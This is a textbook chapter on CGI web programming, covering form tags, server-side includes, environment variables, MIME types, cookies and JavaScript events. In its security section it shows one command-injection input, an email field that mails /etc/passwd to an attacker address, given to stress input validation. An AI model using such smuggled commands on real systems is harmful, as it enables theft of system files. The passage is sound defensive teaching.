UNIX Unleashed, Internet Edition

- 17 -

Programming Web Pages with CGI

by Robin Burk; David B. Horvath, CCP; and Matthew Curtin

So far in this section, we've seen how HTML can be used to specify the content and appearance of screen text and how MIME extends those capabilities to include other media such as graphics, audio, and video.

These elements on a Web page are static. That is, they are output to the user without soliciting or responding to user input (with the possible exception of hotlinks that allow the user to specify which media files to retrieve and when).

Web pages are not limited to static information displays, however. The Web, and indeed the entire Internet, is based on a client-server architecture. Interactions between client machines and Net servers provide much of the Web's flexibility and usefulness, contributing greatly to its rapid growth and the use of the Web for serious business purposes.

In this chapter, we'll look at the client side of one enabling, interactive technology: the Common Gateway Interface. In the following chapters, we'll look at CGI from the server side as well.

What Is the Common Gateway Interface?

The Common Gateway Interface (CGI) defines a platform-independent gateway from HTML scripts to other processes executing on the server. The most common use of CGI on Web pages is to pass data gathered on a screen form to a database application, and to populate a new client screen with appropriate information in response.

CGI mostly executes on the server. In the next few chapters of this section of UNIX Unleashed, we'll examine the details of CGI server-side implementation on UNIX using a variety of script and compiled languages.

However, an important part of this interactive process is the user interface for capturing user input and reporting information back to the user. It's this client side of CGI that we'll examine in this chapter.

What CGI Is Not

It's important to understand that CGI programs run on your server. Because of this, CGI is a great way to make database queries, HTML forms submission handling, and that sort of thing. It's not a good way to try to do things like animation, a Web-based tic-tac-toe game, or checking to make sure that something submitted via a form is in the correct format. Things that make more sense to run on the client (for instance, in someone's browser) are better implemented with something like Java, JavaScript, or Safe-Tcl. (Checking for valid data formats in forms submissions is a good example of something that makes sense to run on the client. Why burden your server with hits and processing time, only to tell the user that what he typed in is bogus? This also needs to be done on the server. More on that later.)

SSI (Making dynamic pages without CGI)

SSI (Server-Side Includes) can also be used to generate dynamic pages. This works by having the server parse the HTML of the requested file, looking for, and then executing certain commands embedded inside of HTML comments. The server can even be configured to execute shell commands. Does this scare you? It should. The server reads the HTML, and will execute things contained therein. If shell commands and CGI programs are allowed to be called, this is a very, very dangerous feature, especially if you allow users to publish their own pages (via the public_html directory in their home directories), and allow SSI in those directories.

Does this mean that SSI is always a Bad Thing and should always be avoided? No. The reason I mention SSI in the context of CGI is because it's a good idea to know what your options are, what makes sense in various situations, so you can use the right technology to get the end result that you want. SSI is appropriate for smaller-scale customizations of web pages, such as page headers, page footers, and other things that can be accomplished without an SSI exec. CGI, on the other hand, is a means of making much more sophisticated web-based applications, and handling things like forms input. Generally speaking, if the focus of what you're writing is the HTML, with minor customizations to be done on the server, SSI is a good choice, but if the focus of what you're doing is the dynamic part of your content, perhaps including only small bits of preformatted HTML, CGI is the way to go. That having been said, it's also important to note that CGI is a standard interface, whereas SSI is an invention of the NCSA HTTPd folks, although it's supported widely on other web servers as well now. SSI might present a compatibility problem for you in the future, if you decide to move from one server to another.

More information is provided in the Server-Side Includes section later in this chapter.

Server APIs vs. CGI

Web server software such as Apache and Netscape's offerings support the functionality of writing code that effectively becomes a part of the web server itself. In some cases, this could be useful (such as when it would be beneficial to add some functionality to the core server.) However, use of a server's API will limit your program's portability to one server, OS, and processor architecture. If what you want to do is simply something that should be part of the server's core functionality, and the API gives you the support you need, go for it. But, for the vast majority of server-side processing, CGI is the way to go.

How CGI Works

The client-server interaction in CGI follows a series of standard steps:

1. The Web client (browser) connects to a Web server process by means of a URL.

2. The Web server delivers the HTML (and other files that make up the requested Web page) to the client. The connection is automatically dissolved once the page contents have been delivered.

3. At the client, the HTML script prompts the user for some action or input. When the user responds, the client asks the Web server to establish a new communications connection with the client.

4. Once the connection had been established, the client passes the user's input data to the Web server.

5. The Web server process passes this information, along with other process variables, to the CGI program specified by the HTML script in the form of a URL.

6. The CGI program performs some operation based on the input, generates a response to the client (typically in the form of an HTML document), and passes this to the Web server.

7. The Web server transmits the response to the client and (in most cases) closes the connection.

On the client side, processing occurs by means of HTML tags, which are interpreted the same way as other tags. On the server side, UNIX environmental variables, command-line arguments, and standard input and output files can be used to communicate between the Web server and the CGI program.

Basic Forms: Tags and Attributes

CGI forms are defined using HTML tags and elements that are dedicated to this purpose.

`FORM`

The FORM tag begins the definition of a form. Any number of forms may be defined on a given HTML page, but forms cannot be nested within one another. When designing Web pages that make use of forms, therefore, think about the logical flow of information and divide complex forms into successive, simpler ones if to do so would help the user keep track of the information and choices he must specify.

Any other legal HTML tags may be embedded within a form definition. Standard HTML is used, for instance, to label the input fields and the form itself.

Attributes:

ACTION--specifies the program on the Web server machine that will receive and process the form input.
METHOD--specifies how the form will send its information back to the server. The most common method is POST, which sends the input information separately from the URL of the originating page. The other method is GET, which returns the input information appended to the URL itself.

TIP: URL fields are limited in length. Except for very simple list selections or queries, use POST to return all forms input.

ENCTYPE--an optional element that tells the browser the MIME type into which to encode the information that will be sent to the server. The default type is text/x-form-url-encoded, which passes the input information as text to the Web server. The other option is multipart/form-data. This MIME type supports multiple formats within a single overall message; it is specified, for instance, when the user types in the name of a file to be uploaded to the server.

Example:

<FORM ACTION="/cgi-bin/new-query"  METHOD=POST>

`INPUT`

The INPUT tag is used to define various types of input fields within a form.

Attributes:

TYPE--specifies the kind of input field to be displayed. Legal types include text, password, checkbox, radio, file, submit, and reset.
TEXT fields accept keyboard characters and echo them back to the screen.
PASSWORD fields accept keyboard characters, but echo asterisks rather than the keyed text.
CHECKBOX fields are used in selection lists. Each checkbox is independent of others in the list; more than one can be selected at a time.
RADIO buttons are also used in selection lists; however, only one radio button in the list can be chosen. The multiple options generally share a single variable name.
FILE fields accept the name of a local file to be uploaded to the server.
SUBMIT buttons allow the user to initiate sending the form information to the server.
RESET buttons allow the user to cancel form input and return all fields to their default values.
HIDDEN fields do not appear on the screen. They are used to pass persistent information from client to server and back to the client, because HTML is otherwise a stateless language.
NAME--assigns a variable name to the information to be entered in this field.
SIZE--specifies the size of the input box to be displayed on the screen for a text or password field. Size does not constrain the length of the input for this field; if the user types more characters, the field will scroll to the left.
MAXLENGTH--specifies the maximum number of characters that may be entered in a text or password field.
VALUE--specifies the text to be associated with the field. This may be a default text value, the label associated with a checkbox or the option associated with a reset or radio button.
CHECKED--indicates if a checkbox or radio button is to be selected as the default status.

Listing 17.1 shows a typical sequence of field definitions and other HTML tags that might be used in a form.

Listing 17.1. Field definitions for a form.

<P>
Enter Userid:
<INPUT TYPE=text NAME="userid" VALUE="enter id here" SIZE=15 MAXLENGTH=15>
<P>
and Password:
<INPUT TYPE=password NAME="passwd" VALUE="(required)" SIZE=10 MAXLENGTH=10>
<P>
<INPUT TYPE=checkbox NAME="option1" >Choose option 1
<INPUT TYPE=checkbox NAME="option2" >   and option 2 if you like<BR>
<P>
<P>
Select one of the following:
<INPUT  TYPE=radio VALUE="a" NAME="choice" CHECKED > A
<INPUT  TYPE=radio VALUE="b" NAME="choice" > B
<INPUT  TYPE=radio VALUE="c" NAME="choice" > C<BR>
<P>
<INPUT TYPE=file NAME="send-file"
<INPUT TYPE=hidden NAME="user-state" VALUE="been here already">

These field definitions would result in the screen form shown in Figure 17.1.

Figure 17.1
Form fields as displayed by the browser.

Several aspects of this form are worth noting at this point. First, notice the use of standard HTML scripting to assign labels to the text and password fields and to display a header for the checkbox and radio button lists.

Second, notice that the browser (not the programmer) assigns the button label for file fields. This reminds us that HTML passes directives to the Web client (browser), but is not a text-formatting language. As with other tags, the screen results displayed by various browsers may differ when processing certain form-related tags.

And finally, note that the hidden field does not appear on the screen.

Advanced Forms

Although INPUT is the basic field definition tag, client-side CGI offers a number of other interactive capabilities for advanced forms processing.

`SELECT` and `OPTION`

The SELECT and OPTION tags provide a way to define a menu of options and capture the user's selection. Although you could hard-code this functionality using checkboxes and radio buttons, the SELECT list provides a more sophisticated menu effect and saves considerable screen space if the selection list is long.

As with the INPUT TYPE=file construct, different browsers may display a SELECT menu in somewhat different ways. All will, however, provide the user with a scrollable list of options from which to choose.

As with other HTML tags, the <SELECT> tag must be paired with a closing </SELECT> tag. In addition to the attributes associated with the SELECT tag itself, the selection list is defined as a series of <OPTION> tags between the <SELECT> and </SELECT> pair.

<SELECT> Attributes:

NAME--assigns a variable name to the information to be entered in this field.
SIZE--specifies the number of options that are visible at any one time. In many browsers, a value of 1 causes the list to be implemented as a pull-down menu and a greater value causes it to be implemented as a scroll window.
MULTIPLE--if present, indicates that the user may choose more than one selection.

<OPTION> Attributes:

SELECTED--if present, indicates that the option is selected by default.

Listing 17.2 shows the definition of two SELECT lists.

Listing 17.2. Defining `SELECT` lists.

Please choose an option from the menu:
<SELECT NAME="pulldown" SIZE=1>
<OPTION>menu choice 1
<OPTION>menu choice 2
<OPTION>menu choice 3
</SELECT>
<P>
Please choose an option from the scrolling window:
<SELECT NAME="scrolling" SIZE=2>
<OPTION> window choice 1
<OPTION> window choice 2
<OPTION> window choice 3
</SELECT>
<P>

Figure 17.2 shows the resulting form display on the browser.

Figure 17.2
SELECT lists as pull-down menus and scrollable windows.

`TEXTAREA`

The TEXTAREA tag is used to create a multiple-line field for free-form text entry. Web page designers often add a textarea field to collect user comments, e-mail to the web author, or similar unstructured information.

As with SELECT, TEXTAREA requires a beginning and ending tag. Between these tags, and in addition to the attributes of the tag, the programmer can enter variable-length default text that will display when the textarea field is drawn on the screen. This text must be deleted by the user before he enters his own input.

Attributes:

NAME--assigns a variable name to the information to be entered in this field.
ROWS--specifies the number of rows to reserve on the screen. Actual input can exceed the visible textarea field.
COLS--specifies the width in characters of the textarea field on the screen.

Listing 17.3 defines a TEXTAREA field and Figure 17.3 shows the resulting form on the Netscape browser.

Listing 17.3. Defining a free-form `TEXTAREA`.

<P>
Please add any comments or special instructions below:
<P>
<TEXTAREA NAME="terms"  ROWS=6  COLS=50>
(comments)
</TEXTAREA>

Figure 17.3
Free-form TEXTAREA as displayed by the browser.

Server-Side Includes

HTML has no provision for defining and calling subroutines. However, a similar functionality can be added to your Web pages by means of a technique called server-side includes.

NOTE: Most popular Web server software supports server-side includes, but a few don't. Check your server documentation to verify if your own system has this capability.

This technique consists of asking the Web server to execute HTML code that is not included in the current HTML document. This allows reuse of standard lists, forms, or other information across multiple pages without running the risk that updates to the information would occur on some pages but not on others.

Another use for server-side includes is to dynamically create HTML as output from one page, then execute it within the shell of another page. This is a somewhat awkward way to embed dynamic HTML in your Web site, but is occasionally useful.

The syntax for server-side includes is as follows:

<!--#include virtual="/yourfilestring/here"

While retrieving and transmitting the base HTML document, the server will encounter this line and insert the contents of the specified file into the document at that point.

This technique imposes additional burden on the server system. In most cases, this has a negligible effect; however, on busy systems or in the case of very large include files, the resources necessary to interpret the included HTML can impact server performance.

It is customary (but not necessary) to name documents with server-side includes using the extension .shtml and to configure the Web server software such that all files with this extension are actively parsed by the server. In this case, files with the .html extension would be transmitted to the client without interpretation.

Design Considerations

Client-side CGI provides Web page developers with a rich set of form elements. As we'll see in subsequent chapters, server-side CGI provides an equally rich set of gateway and data manipulation capabilities.

Having good tools doesn't automatically guarantee that they will be used well, however. For your Web pages to be effective, you must pay attention to some design and coding considerations.

Fortunately, with most Web clients (browsers) you can view forms as you create them by loading the HTML file into the browser program. This will allow you to check out a page and experiment with design approaches without having a programmed server at hand.

Here are some guidelines and tips for creating attractive, easy-to-use Web pages that include forms:

Begin by laying out a logical view of the information flow on your site. What input and output objects should be close to one another? What information should be grouped on another form or another page?
Once you've identified a smooth information flow, choose a "look and feel" for your site. Will this be very business-like? Bright and flashy? Full of rich images that will take time to download?
The best way to choose an appropriate look and feel is to consider the needs and interests of your Web site's main audience. Is this a regular place for them to retrieve or input information? If so, make sure that the pages aren't cluttered and that they can complete the core input without having to tab through a lot of optional fields, which can go on a secondary form or page to be called up when necessary.
On the other hand, if your site must catch the attention of passers-by, choose design elements such as graphics that will get your message out as soon as the page begins loading.
Consistency is an important factor in screen and form design. Choose a few colors, fonts, and backgrounds. Place labels in the same relative place for all text fields, buttons, and checkboxes. Use HTML tags to align the labels and boxes so that the user's eye doesn't need to jump around on the screen in order to follow the information flow.
Make sure that the navigation path through the form parallels the appropriate information flow. In general, group fields in the order that the information naturally comes to mind; for instance, place name, address, and telephone together in one area of the form.
Save screen real estate, but not at the expense of readability. Size pull-down menus, selection boxes, and textareas so that they display some, but not necessarily all, of the options or input text.
Select input field types with an eye to ease of use. Where the user must choose from a long list of options, use pull-down menus. To allow him to select a variable number of options from a relatively short list, use checkboxes. Save radio buttons for toggling among a few options that seldom change from the default value.
Where appropriate, define default values so that your user can tab through the form quickly.
Be aware of the server side of things when you program client-side CGI. In particular, avoid using UNIX or CGI variable names for form fields. If your CGI program will access a formal database, avoid using database field names as well.

Using CGI

When you access a Web page (by specifying the URL or clicking on a link in another page), the server uses the provided path and retrieves it for your browser. The same thing occurs when your browser requests an image, sound file, or other file. When the item desired is static or nearly so in nature (like vacation photographs or the list of your top 10 favorite teachers), simple HTML files are an easy way to go.

But if the data is not static, someone must constantly maintain and update the HTML. If the data is frequently changing (like the weather or the stock market), this become difficult. With the time involved to research the data by hand and update the HTML, by the time it is available, it is already out of date. In addition, we all have better things to do than being report formatters.

Instead of loading a static HTML file, a CGI script can be executed. The script does whatever research is necessary (database lookups, calculations, and so on) and then writes out HTML code to dynamically create the page. Instead of the data being hours or even weeks out of date through the manual process, it can be as current as processing and Internet time lags allow (seconds).

HTML is interpreted by a browser and could be thought of as executing on the client machine. Other tools, such as Java, JavaScript, and others, execute on the client machine. CGI is different, it executes on the server (the machine you may have to take care of). You should be able to control the code that executes on the server, because you wrote it or can control what code other people execute.

How To Execute CGI

When you are coding your HTML, you can reference a CGI script just like a Web page or other resource (image, sound, and so on). The server determines that the resource is a file to execute, not send. Some servers require that these files, no matter what the name, be placed in a special directory to ease in identification.

The URL used to execute a CGI script when the user clicks on a link might look like the following:

<a href="http://www.company.domain/cgi-bin/environ?query=1"> xxx </a>

The URL used to automatically execute a CGI script when the page is loaded (to update and display a counter in the form of a gif image) might look like the following:

<img src="http://www.name.com/cgi-bin/nph-count.gif?width=9&link=xxx">

Security Issues

You must code your scripts carefully to prevent input data from being executed. You must verify the size, form, and validity of input data. If you expect an email address as input (and use it to send mail to that address), you must make sure that it is just an email address. If the user types in her proper e-mail address, everything works fine. But if she decides to be difficult and enter her e-mail address as

myname@myaddress.com ; mail cracker@hiding.out < /etc/passwd

then your password file has been sent to cracker@hiding.out.

Many security problems arise because the system was designed and implemented by people who didn't understand the environment where the application would be deployed.

Here are some tips that will be useful in developing good CGI programs.

Don't assume that no one sitting somewhere on the Internet between a remote client and the server where your CGI application is running will be able to see the traffic between the two. If you have data that is at all sensitive, use SSL or SHTTP to encrypt that channel.
Don't use an HTTP GET when you should use a POST. As a general rule, anytime you want to send data back up to the server, it should be done with a POST, unless you're passing up a small amount of data that has absolutely no security or privacy implications associated with it. For example, if you've got a CGI program that will give a city street map based on coordinates passed up to the server, that's fine to put in a GET so you can process the query string. However, if you're passing up someone's credit card number, or any other private, personal data (even a name or phone number!), do so with a POST.
Since using GET and query strings makes the parameters part of the URL, the data sent up from the client will appear in proxy logs, and are more easily obtained than POST data.
Do write your programs to be as paranoid as possible, especially if they're going to be accessible from the Internet. The Internet is becoming an increasingly bad neighborhood, and people will try to exploit your programs to do naughty things. Simply assuming that you can't be a target is stupid.
Don't create programs that are completely useless to people not running the most recent beta of a browser that's implemented tons of proprietary features. While a given browser might be used enough that you can address most of your audience, keep in mind that there are people out there whose browsers won't display frames, whose vision is so impaired that they have to use text-only browsers, and some behind firewalls that filter out JavaScript.
The Internet was built to connect people together, and to let everyone exchange ideas. Don't build proprietary systems that go contrary to the whole spirit of the Internet, and prevent people from using the resource. There isn't anything wrong with building CGI applications (or static HTML pages!) that take advantage of certain browser types, use features like frames, and highly graphical user interfaces, per se, but if you do this, make sure that you build your applications in such a way that those without those features can use them. Some examples include putting something more than ''go get a browser that can support frames'' in the part of the page that displays on non-frames browsers, and provide a text-only version of the page, or use ALT parameters on your <IMG> tags so they can still be navigated without the use of images.

Following these simple guidelines will prevent you from needlessly limiting your audience, hindering your program's usefulness, and compromising the privacy of people using it.

Data Available to the Shell Script

There are a number of environmental variables and other data sources available to the CGI script written in any other language. The variables and values vary by the Web server and the Web browser being used on the client side.

Table 17.1 shows the common environmental variables available to CGI scripts. These are in addition to the normal variables that may be available from the shell itself.

Table 17.1. Environmental variables.

Variable Description

AUTH_TYPE User authentication type (if used)

CONTENT_LENGTH Size of data in bytes

CONTENT_TYPE Content type of attached data (used with PUT and POST)

GATEWAY_INTERFACE CGI specification version supported by the server

HTTP_ACCEPT The MIME types the client browser will accept in comma delimited form: type/subtype, type2/subtype

HTTP_CONNECTION Connection type ("Keep-Alive" for example)

HTTP_HOST DNS name of server, may be an alias

HTTP_REFERER Source of link to this CGI script (from location)

HTTP_USER_AGENT Software name/version of client browser

PATH_INFO Information about path of script (location)

PATH_TRANSLATED Translated version of PATH_INFO with logical names translated into physical

QUERY_STRING Arguments placed after the ? in the URL are stored in this environment variable

REMOTE_ADDR IP address of remote host

REMOTE_HOST Name of remote host (via DNS) or IP address if DNS name not available

REMOTE_IDENT User id (if IDENT - RFC 931 - is supported)

REMOTE_USER Authenticated user id (if used/supported)

REQUEST_METHOD Request method (GET and POST)

SCRIPT_NAME Logical path and name of script

SERVER_NAME Server Name (DNS alias, actual name, or IP address)

SERVER_PORT Port used to answer request

SERVER_PROTOCOL Name/version of protocol used

SERVER_SOFTWARE Name/version of Web server software

In addition to the query string that is attached to the URL after the ? (returned through the environment variable QUERY_STRING), data is available through STDIN (standard input). The data will be in the form described by CONTENT_TYPE and will be CONTENT_LENGTH bytes long.

There is no guarantee that there will be an end-of-file character at the end of the input. You can read CONTENT_LENGTH number of bytes and then decode the data as necessary. Data submitted from a form is typically in the CONTENT_TYPE of 'application/x-www-form-urlencoded', which converts any non-text characters to their hexadecimal equivalents (a space becomes %20).

Output from CGI scripts is written to STDOUT (standard output). It should contain a HTTP header to tell the browser what kind of data it is getting. Anything after that is interpreted as that type of data by the browser. If the browser is told that it is getting HTML, it will interpret it as HTML; if it is told that a gif file is coming from the server, it will attempt to interpret what follows as a gif image.

Output Types

At the beginning of every CGI script, you need to tell the client browser what it is you are sending. This is done through the first two lines:

Content-type: text/html
_

The first line is the type of data, the second line is always blank. The server will add in additional information as needed.

The most basic type is text/html, which is used, as the name implies, to denote that it contains HTML code in a text format (no binary data). These are referred to as MIME (Multipurpose Internet Mail Extension) types (MIME is explained in Chapter 16 of Volume 2) and are used to specify the type of data and encoding method used to transmit that data.

Table 17.2 shows the common content types. The Web browser might not be able to handle a specific type directly. In that case, it will use what are known as "helpers" or "helper applications," which are external programs that are able to handle the content.

Table 17.2. Common content types.

Content Type Description

application/fractals Fractal

application/mac-binhex40 Macintosh archive

application/octet-stream Binary executable

application/postscript Postscript file

application/rtf Rich text format

application/x-compress Compressed file

application/x-csh C shell script

application/x-gzip Gzip-compressed file

application/x-latex LaTeX file

application/x-sh Bourne shell script

application/x-stuffit Macintosh archive

application/x-tar Gzip-compressed UNIX tape archive

application/x-tar Unix tape archive format

application/x-troff-man Troff/manual

application/x-unknown-content-type Unknown

application/x-www-form-urlencoded Encoded data from HTML form

application/x-zip-compressed Zip compressed file

audio/basic Sound file

audio/x-aiff Aif sound file

audio/x-wav Windows WAV sound

image/gif Compuserve image format

image/jpeg Image format (jpeg)

image/tiff Image format (tiff)

image/x-cmu-raster Image format

image/x-portable-anymap Image format

image/x-portable-bitmap Image format

image/x-portable-graymap Image format

image/x-portable-pixmap Image format

image/x-rgb Image format (rgb)

image/x-xbitmap Image format

image/x-xpixmap Image format

text/html Hypertext Markup Language

text/plain Plain text

text/richtext Richtext

video/mpeg M-Peg video

video/quicktime Quicktime video

video/x-msvideo Windows AVI video

video/x-sgi-movie SGI movie format

CONTENT_TYPE tells your script what it received from the browser; HTTP_ACCEPT tells it what the browser can display.

It is up to you as a programmer to ensure that your output conforms to the specifications for a particular type. If it does not, the correct results will not be displayed and the users will be annoyed.

The Minimal Response

At a minimum, your CGI script needs to send the content type back to the Web browser and should send something meaningful back (after all, that is why a CGI script is executed--to do something).

As previously mentioned, the URL used for CGI scripts might be different depending on the server software used. Some look for the files in one location while others require different locations.

You should talk to your local administrator or ISP for more information on exactly how to code your URLs and where to place your files when using CGI scripts. The ISP I use requires CGI scripts go in the subdirectory cgi-bin under public_html. When referencing the scripts, only the cgi-bin directory is mentioned.

The technique of creating HTML code in a CGI script is referred to as "Dynamic HTML" because it can change depending on the results of the script being executed. HTML in a regular file (the "normal" way of doing things) does not change unless you replace it, so it is fairly static. Each user could see something different out of a CGI script, so it is very dynamic.

Forms

One of the more common uses for CGI scripts is processing the data received from HTML forms. The form method is coded as POST and the action is the URL for your script. The user enters data through his Web browser into the form described in HTML, and when he clicks the submit button, your script is executed.

There are a number of ways to deal with the data received from the form. You can save it to a file, you can mail it to someone or a mail-enabled application, or you can perform more complex processing. You might enter someone in a database, send her a confirmation e-mail, and then add her to an e-mail mailing list. Or you could just save the data (signing a Web page guest book or filling out a comments form are common examples).

Sending the data as e-mail to a user is the simplest method because you do not have to deal with file or record locking issues. This is especially important if your ISP or system administrator will not let you execute binaries on the system. If you could execute binaries, then you could use a program to access a database.

Make sure you provide users with feedback. It is important that they know that the contents of the form has been submitted and accepted. If there is some kind of error, let them know that too. You should perform data validation--either in your CGI script or within the HTML using something like JavaScript.

CGI-BIN Wrappers

Some Internet Service Providers will not allow you to execute my CGI scripts directly. Mine enforces this restriction. I have to execute a program that then executes my script. This is known as wrappering or wrapping--my code is run by other code.

There are a number of purposes for this. The wrapper can control the amount of CPU, I/O, and other resources my script is able to use (preventing runaway or system-hogging scripts), can provide additional security, and do some of the setup for you by resolving environment variables. Another important feature is the ability to run the wrapper in debugging mode. In that mode it shows all the environment variables that were passed to my script so that debugging is much easier.

The only down side that I have seen so far with the wrapper is that the URL is a little confusing until I got used to it. Instead of coding:

<a href="~joeuser/cgi-bin/test.ksh">Link Text</a>

I code:

<a href="/cgi-bin/cgiwrap/joeuser/test.ksh">Link Text</a>

Netscape Cookies

Cookies are another way to maintain state information. A cookie is simply a bit of data that contains a number of name/value pairs that is passed between the client and the server in the HTTP header, rather than in the query string. In addition to name/value pairs, a number of other optional attributes exist.

Beware that cookies are still at a preliminary state in their specification. You might find that things suddenly don't behave quite the way you'd expect when someone is using a different version of a cookie-supporting browser. The official specification is kept at

http://home.netscape.com/newsref/std/cookie_spec.html.

expiration time
You can define a cookie's lifespan by using this attribute. The field itself is a special date/time string (in GMT) that specifies how long the client will keep the cookie. Until this time is reached, the client will continue to give the cookie to the server with each request made, even if the user restarts his client. If the date isn't provided, the cookie only remains active as long as the client is running; as soon as it is restarted, the cookie is lost.
a domain
This defines the domain name where the cookie is valid. The domain in the ''big seven'' top level Internet domains (COM, EDU, NET, ORG, GOV, MIL, and INT) must have at least two dots in it. Other domains require at least three dots. Hence, if you specify .myhouse.com as the domain for the cookie, the cookie will be passed to www.myhouse.com, www.lab.myhouse.com, and frontdoor.myhouse.com. It will not be sent to anything outside of the .myhouse.com domain, though. If this attribute isn't specified, then the cookie is only valid at the host that issued it. Hence, your program can't get cookies that have been given to the client by someone else, and vice versa.
path
Not only can you limit cookies by domain or to a specific host, but you can specify which path hierarchies a cookie is valid for, as well. For example, if you set this attribute to be /cgi-bin/mystuff, then any program running underneath /cgi-bin/mystuff will be able to use the cookie, such as /cgi-bin/mystuff/game.pl and /cgi-bin/mystuff/runme.pl. However, /cgi-bin/send-me-money.pl would not be able to use your cookie, even though it's on the same server.
''secure'' flag
If this is set, then the cookie will not be sent back up to the server unless it does so through a secure channel, like SSL.

JavaScript

JavaScript is a useful interpreted language that runs inside of the browser. It was introduced in Netscape version 2 as ''LiveScript,'' but its name was almost immediately changed to JavaScript, and it was made to look similar to Java. Having code execute on the client side is nice, especially for CGI purposes, because you can do things like form validation and such on the client side, forcing the load of user-interface oriented things to be processed on the client (where it belongs), rather than on your server (where it doesn't).

JavaScript events are only available in cases where they are applicable. The following is a list of JavaScript events, and notes about when they're applicable.

onBlur
This is when the user has deselected a field (active in another area). Applicable for

* Text fields

* Text areas

* Password fields

* File fields

* Popup Menus

* Scrolling lists

onChange
The user has changed the contents of the field. Applicable for

* Text fields

* Text areas

* Password fields

* File fields

* Popup Menus

* Scrolling lists

onClick
The mouse has been clicked. Applicable for

* Buttons (including submit, reset, and image buttons)

* Checkboxes

* Radio buttons

onFocus
The user has selected this field. Applicable for

* Text fields

* Text areas

* Password fields

* File fields

* Popup Menus

* Scrolling lists

onLoad
The browser is loading the current document. Applicable for

* The HTML <BODY> section only.

onSelect
The user has changed part of a text field that is selected. Applicable for

* Text fields

* Text areas

* Password fields

* File fields

onSubmit
The user has pressed the submit button of a form. The JavaScript is executed before the form is actually submitted, so you can have the JavaScript give a return value of false to cancel the submission. Applicable for

* Forms

onUnload
The browser is closing the current page for frame. Applicable for

* The HTML <BODY> section only.

Reference to CGI Resources

There are many resources available on the Internet and in printed books. The following are some starting points:

CGI Scripting Overview

http://hoohoo.ncsa.uiuc.edu/cgi/overview.html

Yahoo's CGI links

http://www.yahoo.com/Computers_and_Internet/Internet/World_Wide_
Web/CGI_Common_Gateway_Interface/

Using HTML 3.2, Java 1.1, and CGI, Eric Ladd and Jim O'Donnell, Que Corporation, 1996, ISBN 0-7897-0932-5.

Summary

The Common Gateway Interface (CGI) provides a powerful and flexible way to extend Web page functionality.

Client-side CGI is programmed using HTML tags, resulting in forms that capture user input and transmit it to server-side applications. The server side of CGI passes this information to application programs that return updated Web pages and other information to the client system.

There are three general categories of tools for the development of CGI:

UNIX Shell Scripts (like Korn and C Shells)
Advanced Scripting Languages (like Perl)
Compiled Languages (like C and C++)

Each of these tools have their own advantages and disadvantages. Each does some things better and some things worse than the other tools. The next three chapters will provide information on developing CGI using tools in each of these categories.

Variable	Description
`AUTH_TYPE`	User authentication type (if used)
`CONTENT_LENGTH`	Size of data in bytes
`CONTENT_TYPE`	Content type of attached data (used with `PUT` and `POST`)
`GATEWAY_INTERFACE`	CGI specification version supported by the server
`HTTP_ACCEPT`	The MIME types the client browser will accept in comma delimited form: type/subtype, type2/subtype
`HTTP_CONNECTION`	Connection type ("Keep-Alive" for example)
`HTTP_HOST`	DNS name of server, may be an alias
`HTTP_REFERER`	Source of link to this CGI script (from location)
`HTTP_USER_AGENT`	Software name/version of client browser
`PATH_INFO`	Information about path of script (location)
`PATH_TRANSLATED`	Translated version of `PATH_INFO` with logical names translated into physical
`QUERY_STRING`	Arguments placed after the `?` in the URL are stored in this environment variable
`REMOTE_ADDR`	IP address of remote host
`REMOTE_HOST`	Name of remote host (via DNS) or IP address if DNS name not available
`REMOTE_IDENT`	User id (if IDENT - RFC 931 - is supported)
`REMOTE_USER`	Authenticated user id (if used/supported)
`REQUEST_METHOD`	Request method (`GET` and `POST`)
`SCRIPT_NAME`	Logical path and name of script
`SERVER_NAME`	Server Name (DNS alias, actual name, or IP address)
`SERVER_PORT`	Port used to answer request
`SERVER_PROTOCOL`	Name/version of protocol used
`SERVER_SOFTWARE`	Name/version of Web server software

Content Type	Description
application/fractals	Fractal
application/mac-binhex40	Macintosh archive
application/octet-stream	Binary executable
application/postscript	Postscript file
application/rtf	Rich text format
application/x-compress	Compressed file
application/x-csh	C shell script
application/x-gzip	Gzip-compressed file
application/x-latex	LaTeX file
application/x-sh	Bourne shell script
application/x-stuffit	Macintosh archive
application/x-tar	Gzip-compressed UNIX tape archive
application/x-tar	Unix tape archive format
application/x-troff-man	Troff/manual
application/x-unknown-content-type	Unknown
application/x-www-form-urlencoded	Encoded data from HTML form
application/x-zip-compressed	Zip compressed file
audio/basic	Sound file
audio/x-aiff	Aif sound file
audio/x-wav	Windows WAV sound
image/gif	Compuserve image format
image/jpeg	Image format (jpeg)
image/tiff	Image format (tiff)
image/x-cmu-raster	Image format
image/x-portable-anymap	Image format
image/x-portable-bitmap	Image format
image/x-portable-graymap	Image format
image/x-portable-pixmap	Image format
image/x-rgb	Image format (rgb)
image/x-xbitmap	Image format
image/x-xpixmap	Image format
text/html	Hypertext Markup Language
text/plain	Plain text
text/richtext	Richtext
video/mpeg	M-Peg video
video/quicktime	Quicktime video
video/x-msvideo	Windows AVI video
video/x-sgi-movie	SGI movie format

UNIX Unleashed, Internet Edition

- 17 -

Programming Web Pages with CGI

What Is the Common Gateway Interface?

What CGI Is Not

SSI (Making dynamic pages without CGI)

Server APIs vs. CGI

How CGI Works

Basic Forms: Tags and Attributes

FORM

INPUT

Listing 17.1. Field definitions for a form.

Advanced Forms

SELECT and OPTION

Listing 17.2. Defining SELECT lists.

TEXTAREA

Listing 17.3. Defining a free-form TEXTAREA.

Server-Side Includes

Design Considerations

Using CGI

How To Execute CGI

Security Issues

Data Available to the Shell Script

Table 17.1. Environmental variables.

Output Types

Table 17.2. Common content types.

The Minimal Response

Forms

CGI-BIN Wrappers

Netscape Cookies

JavaScript

Reference to CGI Resources

Summary

`FORM`

`INPUT`

`SELECT` and `OPTION`

Listing 17.2. Defining `SELECT` lists.

`TEXTAREA`

Listing 17.3. Defining a free-form `TEXTAREA`.